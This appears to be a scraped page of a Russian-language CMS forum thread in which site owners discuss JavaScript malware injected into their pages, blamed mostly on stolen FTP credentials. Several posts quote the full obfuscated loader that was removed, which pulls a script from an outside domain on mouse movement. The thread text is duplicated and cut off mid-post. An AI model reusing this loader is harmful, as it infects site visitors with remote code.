rusisha Опубліковано: 27 квітня 2011 Share Опубліковано: 27 квітня 2011 Доброго времени суток уважаемые! Вот ПРОБЛЕМА Гугл говорит ВИРУС что делать не знаю... p.s. прошу прошение за неинформативность топика. Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 27 квітня 2011 Share Опубліковано: 27 квітня 2011 почистить можно. но сначала надо просканить свой комп и сменить пароли доступа к хосту. также есть вероятность, что поимели "соседний сайт" (или вобще весь сервер) однако проверить это не всегда просто. Надіслати Поділитися на інших сайтах More sharing options... rusisha Опубліковано: 27 квітня 2011 Автор Share Опубліковано: 27 квітня 2011 проблему решили, огромная благодарность "afwollis" за поддержку. Надіслати Поділитися на інших сайтах More sharing options... monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 А каким образом решили? Может, не дай Бог, пригодится кому-нить... :) Надіслати Поділитися на інших сайтах More sharing options... gdi31 Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 Походу Ющенко помог избавиться, как ни как менеджер на сайте :). Надіслати Поділитися на інших сайтах More sharing options... monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 :lol: Таки да! Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое. Надіслати Поділитися на інших сайтах More sharing options... 19th Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 :lol: Таки да! Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое. Не предыдущем хостере было что взломали самого хостера, вернее один из его серверов и через него "завирусили" все сайты. Это было последней каплей. Надіслати Поділитися на інших сайтах More sharing options... Yesvik Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.В 99% случаев это скомпрометированный доступ по FTP. При этом в 99,99% случаев пишут про дырки... Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. 1 Надіслати Поділитися на інших сайтах More sharing options... monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 В 99% случаев это скомпрометированный доступ по FTP. У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... rabb1tkhv Опубліковано: 13 червня 2011 Share Опубліковано: 13 червня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился ((( Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 15 червня 2011 Share Опубліковано: 15 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт? Надіслати Поділитися на інших сайтах More sharing options... rabb1tkhv Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Надіслати Поділитися на інших сайтах More sharing options... supleader Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол. Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... Sed Опубліковано: 1 липня 2011 Share Опубліковано: 1 липня 2011 Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов). Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Не помогло... Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 2 липня 2011 Share Опубліковано: 2 липня 2011 Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением? Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Sed, тему читайте полностью, а не последние сообщения. Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает... Надіслати Поділитися на інших сайтах More sharing options... Fix305 Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 значит не все файлы почистил Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... afwollis Опубліковано: 14 липня 2011 Share Опубліковано: 14 липня 2011 (змінено) ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки. возможны побочные эффекты, такие, как: - впадение в кому; - временная инвалидность; - ... не исключена возможность летальных исходов... родина вас не забудет. = = = обращаться в ЛС только при наличии больного поциента. Змінено 14 липня 2011 користувачем afwollis Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Отчёты об ошибках [Решено] Дырка в коде? Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich Промо банери в категоріях товарів Автор: IHOR1989 Trend - адаптивний універсальний шаблон Автор: DSV × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
rusisha Опубліковано: 27 квітня 2011 Автор Share Опубліковано: 27 квітня 2011 проблему решили, огромная благодарность "afwollis" за поддержку. Надіслати Поділитися на інших сайтах More sharing options...
monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 А каким образом решили? Может, не дай Бог, пригодится кому-нить... :) Надіслати Поділитися на інших сайтах More sharing options...
gdi31 Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 Походу Ющенко помог избавиться, как ни как менеджер на сайте :). Надіслати Поділитися на інших сайтах More sharing options...
monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 :lol: Таки да! Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое. Надіслати Поділитися на інших сайтах More sharing options...
19th Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 :lol: Таки да! Ну, сменить пароль и перезалить файлы дело нехитрое. Меня больше интересует источник проникновения вируса. Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое. Не предыдущем хостере было что взломали самого хостера, вернее один из его серверов и через него "завирусили" все сайты. Это было последней каплей. Надіслати Поділитися на інших сайтах More sharing options...
Yesvik Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 Если это стыренные трояном данные доступа по ftp - это одно, а если таки какая-то дырка в безопасности скрипта - это совсем другое.В 99% случаев это скомпрометированный доступ по FTP. При этом в 99,99% случаев пишут про дырки... Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. 1 Надіслати Поділитися на інших сайтах More sharing options... monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 В 99% случаев это скомпрометированный доступ по FTP. У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... rabb1tkhv Опубліковано: 13 червня 2011 Share Опубліковано: 13 червня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился ((( Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 15 червня 2011 Share Опубліковано: 15 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт? Надіслати Поділитися на інших сайтах More sharing options... rabb1tkhv Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Надіслати Поділитися на інших сайтах More sharing options... supleader Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол. Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... Sed Опубліковано: 1 липня 2011 Share Опубліковано: 1 липня 2011 Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов). Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Не помогло... Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 2 липня 2011 Share Опубліковано: 2 липня 2011 Таким способом нашел лишь пять файлов index.html в разных папках. Антивирусом вообще ничего не нашел. Яндекс-вебмастер, например, указывает, что эта страница заражена. http://www.1catalog1.ru/index.php?route=product%2Fproduct&product_id=240 Скачал только ее, внимательно просмотрел код - ничего не нашел. Как можно еще попытаться решить проблему с заражением? Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Sed, тему читайте полностью, а не последние сообщения. Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 Да все сделал как написано. Сменил пароль, просканил (почистил) комп, почистил файлы - не помогает... Надіслати Поділитися на інших сайтах More sharing options... Fix305 Опубліковано: 3 липня 2011 Share Опубліковано: 3 липня 2011 значит не все файлы почистил Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... afwollis Опубліковано: 14 липня 2011 Share Опубліковано: 14 липня 2011 (змінено) ищу поциентов для комплексных обследований, вынесений диагнозов и разработки универсальной сыворотки. возможны побочные эффекты, такие, как: - впадение в кому; - временная инвалидность; - ... не исключена возможность летальных исходов... родина вас не забудет. = = = обращаться в ЛС только при наличии больного поциента. Змінено 14 липня 2011 користувачем afwollis Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Отчёты об ошибках [Решено] Дырка в коде? Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich Промо банери в категоріях товарів Автор: IHOR1989 Trend - адаптивний універсальний шаблон Автор: DSV
afwollis Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. 1 Надіслати Поділитися на інших сайтах More sharing options... monax Опубліковано: 28 квітня 2011 Share Опубліковано: 28 квітня 2011 В 99% случаев это скомпрометированный доступ по FTP. У меня когда-то тоже подсел вирус на один из моих сайтов. Помню, кипишнул я тогда нипадецки. Первая мысль была - "дырка в коде". Но потом поспрашивал знающих людей и согласился, что, вероятнее всего, таки стырили доступ по ftp. Не факт, что с моего компа, т.к. достаточно трепетно отношусь к безопасности (антивирус, файрвол, антитроян и т.п. :rolleyes: ), но доступ был прописан в Дримвивере ещё на двух других компах. Оттуда, скорее всего, и стянули...Короче, с тех пор ftp вообще не пользуюсь. Даже заблокировал доступ по ftp на сервере. :lol: И пароли ни на каких других компах не оставляю. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... rabb1tkhv Опубліковано: 13 червня 2011 Share Опубліковано: 13 червня 2011 monax, в заголовке ведь четко написано - "боремся с вирусами". Ни о каких "дырках в скрипте" речи нет. Подробно разбирать проблему не стали, хотя известна дата заражения файлов. Пострадали как всегда индексные файлы, доступные для записи. Кроме них заражению подверглись header.*, footer.* и большая часть *.js. Гадость была почищена спец.скриптом, запущенным через cron. В результате "поломалась" библиотека jquery, которую быстро загрузили из чистого архива. Тоже эта гадость вылезла, причем на двух хостингах сразу (оба хостинга - разные, но у одного хостера)Если не сложно - поделитесь скриптом для Cron, а то вылавливать код в файлах запарился ((( Надіслати Поділитися на інших сайтах More sharing options... Sed Опубліковано: 15 червня 2011 Share Опубліковано: 15 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт? Надіслати Поділитися на інших сайтах More sharing options... rabb1tkhv Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Доброго времени суток. Такая же проблема - сайт блокируется, как вредоносный. Причем в Опере блокируется, а в Мазиле нет, спокойно работает. Каковы пути решения проблемы? Скачать базу и перезалить скрипт?Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов).Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var _0x5cb4=["\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x69\x6E\x75\x78\x73\x74\x61\x62\x73\x2E\x63\x6F\x6D\x2F","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x2E\x6A\x73","\x6F\x6E\x6D\x6F\x75\x73\x65\x6D\x6F\x76\x65","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];(function (){var _0x8dacx1=_0x5cb4[0]+Math[_0x5cb4[2]]().toString()[_0x5cb4[1]](3)+_0x5cb4[3];var _0x8dacx2=0;document[_0x5cb4[4]]=function (){if(_0x8dacx2===0){_0x8dacx2=1;var _0x8dacx3=document[_0x5cb4[6]](_0x5cb4[5])[0];var _0x8dacx4=document[_0x5cb4[8]](_0x5cb4[7]);_0x8dacx4[_0x5cb4[9]]=_0x5cb4[10];_0x8dacx4[_0x5cb4[11]]=function (){if(this[_0x5cb4[12]]==_0x5cb4[13]){_0x8dacx2=2;} ;} ;_0x8dacx4[_0x5cb4[14]]=function (){_0x8dacx2=2;} ;_0x8dacx4[_0x5cb4[15]]=_0x8dacx1;_0x8dacx3[_0x5cb4[16]](_0x8dacx4);} ;} ;} )(); </script> заменил на пробел ))) во всех файлах. Все, проблема ушла. Надіслати Поділитися на інших сайтах More sharing options... supleader Опубліковано: 16 червня 2011 Share Опубліковано: 16 червня 2011 Как уже писали, это скомпрометирован доступ по FTP. Не пользуйтесь менеджерами, которые хранят пароли в открытом виде, а еще лучше использовать защищенный протокол. Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... Sed Опубліковано: 1 липня 2011 Share Опубліковано: 1 липня 2011 Проблему решил таким образом - скачал все файлы с хостинга, прогнал их касперычем (лечит большую часть файлов). Затем скачал программу http://www.infortech.ru/prj/open/tr/ Сделал автозамену текста <script type="text/javascript"> var 